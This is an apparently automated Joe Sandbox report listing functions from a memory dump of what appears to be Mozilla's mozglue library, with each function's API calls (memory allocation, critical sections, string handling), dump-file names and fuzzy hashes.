Instruction ID: 861c2ae415c2f48bc547ada0a27002fd192536bf8a00662d33c93612dda6f616
Opcode Fuzzy Hash: 043b335ccc0c29cee0b0370822b89f6d1be607d88ab4fd7875dd365fcf8d6506
Instruction Fuzzy Hash: 3F518271B0021A8FE754CF69CD80B9AB3A6FF88314F294639E915A7B54D730F9068F81

Function 6C2B8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C2AB58D,?,?,?,?,?,?,?,6C2DD734,?,?,?,6C2DD734), ref: 6C2B8E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C2AB58D,?,?,?,?,?,?,?,6C2DD734,?,?,?,6C2DD734), ref: 6C2B8EBF
free.MOZGLUE(?,?,?,?,6C2AB58D,?,?,?,?,?,?,?,6C2DD734,?,?,?), ref: 6C2B8F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C2AB58D,?,?,?,?,?,?,?,6C2DD734,?,?,?,6C2DD734), ref: 6C2B8F46
free.MOZGLUE(?,?,?,?,6C2AB58D,?,?,?,?,?,?,?,6C2DD734,?,?,?), ref: 6C2B8F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C2AB58D,?,?,?,?,?,?,?,6C2DD734,?,?,?), ref: 6C2B8F8F

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: f51bd2ba860db67eebb41c6116cb6b935606f4b5c442b5c7488b22b3c84d1e03
Instruction ID: 53d52cb6a2da1e5e1e36c83106b03fe790004d7fade73310ebf6fda657b4ea58
Opcode Fuzzy Hash: f51bd2ba860db67eebb41c6116cb6b935606f4b5c442b5c7488b22b3c84d1e03
Instruction Fuzzy Hash: 075191B1A0121B8FEB15CF54D8806AE77B6BF48358F65052AED1ABB740E731F904CB91

Function 6C2760E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C275FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C2760F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C275FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C276180
free.MOZGLUE(?,?,?,?,6C275FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C276211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C275FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C276229
free.MOZGLUE(?,?,?,?,6C275FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C27625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C275FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C276271

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 3973511e28443048e6218bf5861ac97ea544e2e0d2a82c8ed6668b5b6970ba4a
Instruction ID: 4ad328762621465ae731034592de545dacc9d39df0fa3387a21b26f63eb2e8a7
Opcode Fuzzy Hash: 3973511e28443048e6218bf5861ac97ea544e2e0d2a82c8ed6668b5b6970ba4a
Instruction Fuzzy Hash: 53519EB1A0120B8FEB64CFA8D8C47AEB7B5EF45308F100439DA16D7B51E731A958CB61

Function 6C2B27E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C2B2620,?,?,?,6C2A60AA,6C2A5FCB,6C2A79A3), ref: 6C2B284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C2B2620,?,?,?,6C2A60AA,6C2A5FCB,6C2A79A3), ref: 6C2B289A
free.MOZGLUE(?,?,?,6C2B2620,?,?,?,6C2A60AA,6C2A5FCB,6C2A79A3), ref: 6C2B28F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C2B2620,?,?,?,6C2A60AA,6C2A5FCB,6C2A79A3), ref: 6C2B2910
free.MOZGLUE(00000001,?,?,6C2B2620,?,?,?,6C2A60AA,6C2A5FCB,6C2A79A3), ref: 6C2B293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C2B2620,?,?,?,6C2A60AA,6C2A5FCB,6C2A79A3), ref: 6C2B294E

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 14ed246e454f3fb1c6e8abe36a1b696765fccc1a5ecb9a36aa10344d58de5610
Instruction ID: 56eb092ae876193c26ce9c86c9d75aa6f2942ede75e71533839166d2e955cdb1
Opcode Fuzzy Hash: 14ed246e454f3fb1c6e8abe36a1b696765fccc1a5ecb9a36aa10344d58de5610
Instruction Fuzzy Hash: 2E41B4F1A0070A8FEB15CF68D88876A77F5AB45748F240939D95AFB740E731E904CB61

Function 6C26CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C2EE784), ref: 6C26CFF6
LeaveCriticalSection.KERNEL32(6C2EE784), ref: 6C26D026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C26D06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C26D139

Strings

MOZ_CRASH(), xrefs: 6C26D187

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: 2baf786ad6891cbd95d95f033dd7a024eb06c4fe44b59733454b78bfa078d3b7
Instruction ID: f99d12be2d9c3341031bf13563423de7d0a8e95fdfa134e17599acd9b7b2e48a
Opcode Fuzzy Hash: 2baf786ad6891cbd95d95f033dd7a024eb06c4fe44b59733454b78bfa078d3b7
Instruction Fuzzy Hash: 6C41AB72B0131A4FDF548E6E8C9876A76A0EB4D714F250139FE58F7BC4D6B198808BE4

Function 6C264DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C264E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C264E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C264EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C264F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C264F1E

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: a86c188106f20a0f7dd0e4b2db2c075bf80ddea409a5ce007bdccaf72054ae70
Instruction ID: ccdae6abfb270c3eb2d2d6dd3379dd7f5a4178c444cb41b59b876d30c375be97
Opcode Fuzzy Hash: a86c188106f20a0f7dd0e4b2db2c075bf80ddea409a5ce007bdccaf72054ae70
Instruction Fuzzy Hash: D441D07160870A9FC705CF2AC49095BB7F4BF89344F108A2DF8A597B41DB30E998CBA1

Function 6C27C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C27C1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C27C1DC

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: f74df2ba4ca474a998a703202ef1385738284a98744309977822c0db02b54922
Instruction ID: 2b5605c7ddae9ec8d7450b68ee72f9a13d7aa544665c8902aa2e0f18b064523d
Opcode Fuzzy Hash: f74df2ba4ca474a998a703202ef1385738284a98744309977822c0db02b54922
Instruction Fuzzy Hash: 6241B3B1D183488FD720DF68C48178AB7F4AF99708F41896DEC885B752E730E548CBA2

Function 6C2CA820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C2EF770), ref: 6C2CA858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2CA87B

Part of subcall function 6C2CA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C2CA88F,00000000), ref: 6C2CA9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C2CA8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2CA90C
LeaveCriticalSection.KERNEL32(6C2EF770), ref: 6C2CA97E

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 1e58dde32c79a1f689090fb80d4a6c59a3983177a653aa6360ac39783875546f
Instruction ID: 09df718cf52a9721310fa9f117dfeaecc661b1c203017bb8bd52a60a79d867fa
Opcode Fuzzy Hash: 1e58dde32c79a1f689090fb80d4a6c59a3983177a653aa6360ac39783875546f
Instruction Fuzzy Hash: 15417FB5E00208DFDB00DFA4D885ADEB771FF48324F148629EC16AB791D771A945CB92

Function 6C271530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C27152B,?,?,?,?,6C271248,?), ref: 6C27159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C27152B,?,?,?,?,6C271248,?), ref: 6C2715BC
moz_xmalloc.MOZGLUE(-00000001,?,6C27152B,?,?,?,?,6C271248,?), ref: 6C2715E7
free.MOZGLUE(?,?,?,?,?,?,6C27152B,?,?,?,?,6C271248,?), ref: 6C271606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C27152B,?,?,?,?,6C271248,?), ref: 6C271637

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: f4e9928cf2d83b46b0d2acff25d67a3828c0a6dac036d03e66f6e650e53f6740
Instruction ID: ba1cde1f88f8a87f221a985772f0d18fa8c620258857246fc10d6abcb8d8f81c
Opcode Fuzzy Hash: f4e9928cf2d83b46b0d2acff25d67a3828c0a6dac036d03e66f6e650e53f6740
Instruction Fuzzy Hash: 4E31EC719001198BC7288E78D8E086E77A9FF85364725072DEC27DBBD4EB30D94587A1

Function 6C2CAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C2DE330,?,6C28C059), ref: 6C2CAD9D

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C2DE330,?,6C28C059), ref: 6C2CADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C2DE330,?,6C28C059), ref: 6C2CAE01
GetLastError.KERNEL32(?,00000000,?,?,6C2DE330,?,6C28C059), ref: 6C2CAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C2DE330,?,6C28C059), ref: 6C2CAE3D

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 2422e28e4b496d761633f27436cb26cd36157be5c86cea0ab2bc6f2085277332
Instruction ID: 728bf9f6ff7d2d4e5fc315578c4e677cc6f05e75c2cff8b6da0d3b002b20bbab
Opcode Fuzzy Hash: 2422e28e4b496d761633f27436cb26cd36157be5c86cea0ab2bc6f2085277332
Instruction Fuzzy Hash: 20312DB1A012199FDB50DF798D44AABB7F8AF49614F158829EC4AE7740E734E804CBE1

Function 6C2C5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C2DDCA0,?,?,?,6C29E8B5,00000000), ref: 6C2C5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C29E8B5,00000000), ref: 6C2C5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C29E8B5,00000000), ref: 6C2C5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C29E8B5,00000000), ref: 6C2C5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C29E8B5,00000000), ref: 6C2C5FD6

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 35e15d4252c7d63a54b18657777a79cfa9172378db3abea3d34871c77fefcb81
Instruction ID: 17ece4abdc25d2b13d35ac3ccd5fd25e596ac0851800d9fd6ad55c1441a6182d
Opcode Fuzzy Hash: 35e15d4252c7d63a54b18657777a79cfa9172378db3abea3d34871c77fefcb81
Instruction Fuzzy Hash: 83313C343006058FD764CF29C898E2AB7F5FF8A319B644668F9568BB95C731EC41CB81

Function 6C26B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C26B532
moz_xmalloc.MOZGLUE(?), ref: 6C26B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C26B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C26B57E
free.MOZGLUE(00000000), ref: 6C26B58F

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 560a6414659fb6a610412b638c127dfd544ba16802b71654755d720c976319c6
Instruction ID: 71bb3cfc67e0957abfa5cd17febc2836eb6420446c0c8f68b02995757942b5d5
Opcode Fuzzy Hash: 560a6414659fb6a610412b638c127dfd544ba16802b71654755d720c976319c6
Instruction Fuzzy Hash: 8F21E471A0020A9BDB008F69CC44BAABBB9FF85314F284029FC18EB781E735D951D7A0

Function 6C26B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C26B7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C26B808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C26B82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C26B840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C26B849

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: ef3b95581bb0e3401893641c7a51dc9dc834a1a74a65203111e9ad75212ce5f5
Instruction ID: 5764c46839b4dda4e650e9d40708f4e33783c59b18a52bf79237b38de0383b8f
Opcode Fuzzy Hash: ef3b95581bb0e3401893641c7a51dc9dc834a1a74a65203111e9ad75212ce5f5
Instruction Fuzzy Hash: 51213BB1E002099FDF04DFA9C8859FEBBB8EF49714F148129EC15A7741E731A984CBA1

Function 6C2C6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C2C6E78

Part of subcall function 6C2C6A10: InitializeCriticalSection.KERNEL32(6C2EF618), ref: 6C2C6A68
Part of subcall function 6C2C6A10: GetCurrentProcess.KERNEL32 ref: 6C2C6A7D
Part of subcall function 6C2C6A10: GetCurrentProcess.KERNEL32 ref: 6C2C6AA1
Part of subcall function 6C2C6A10: EnterCriticalSection.KERNEL32(6C2EF618), ref: 6C2C6AAE
Part of subcall function 6C2C6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C2C6AE1
Part of subcall function 6C2C6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C2C6B15
Part of subcall function 6C2C6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C2C6B65
Part of subcall function 6C2C6A10: LeaveCriticalSection.KERNEL32(6C2EF618,?,?), ref: 6C2C6B83

MozFormatCodeAddress.MOZGLUE ref: 6C2C6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C2C6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C2C6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C2C6EFF

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: d0231d410fce7a42ae9330eee25efc4e4fa6d3aaae60777fc0172a120cfd45d0
Instruction ID: 102c1acb3cef53c8794b8685f9bec7a9bf00d732e02b1cba5845ef44700fdb99
Opcode Fuzzy Hash: d0231d410fce7a42ae9330eee25efc4e4fa6d3aaae60777fc0172a120cfd45d0
Instruction Fuzzy Hash: 73217F71A0421A9BDB50CF69D8C96AA77B5EF88308F044539EC0997241DA709A58CF96

Function 6C2A0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C263DEF), ref: 6C2A0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C263DEF), ref: 6C2A0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C263DEF), ref: 6C2A0DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C2A0D97, 6C2A0DBE
<jemalloc>, xrefs: 6C2A0D92, 6C2A0DB9

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 278007620f07285a8c98f805b3f1c94c0c8f2dad918b942ce00d800e79bddf7e
Instruction ID: 6e1530519fa83eb47ae396085146520e4d80f0e201ca954acdab40e63f79bf27
Opcode Fuzzy Hash: 278007620f07285a8c98f805b3f1c94c0c8f2dad918b942ce00d800e79bddf7e
Instruction Fuzzy Hash: E2F0593238078D23E22012E61C0AF5A375DE7C6B21F304032FE06FA8C0DA54E80286A8

Function 6C2C5850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6C2C586C
CloseHandle.KERNEL32 ref: 6C2C5878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C2C5898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C2C58C9
free.MOZGLUE(00000000), ref: 6C2C58D3

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: 255ad444357ee1c9886f016a4a247e9f78674871fcfdc43ff92a669d9f1e398f
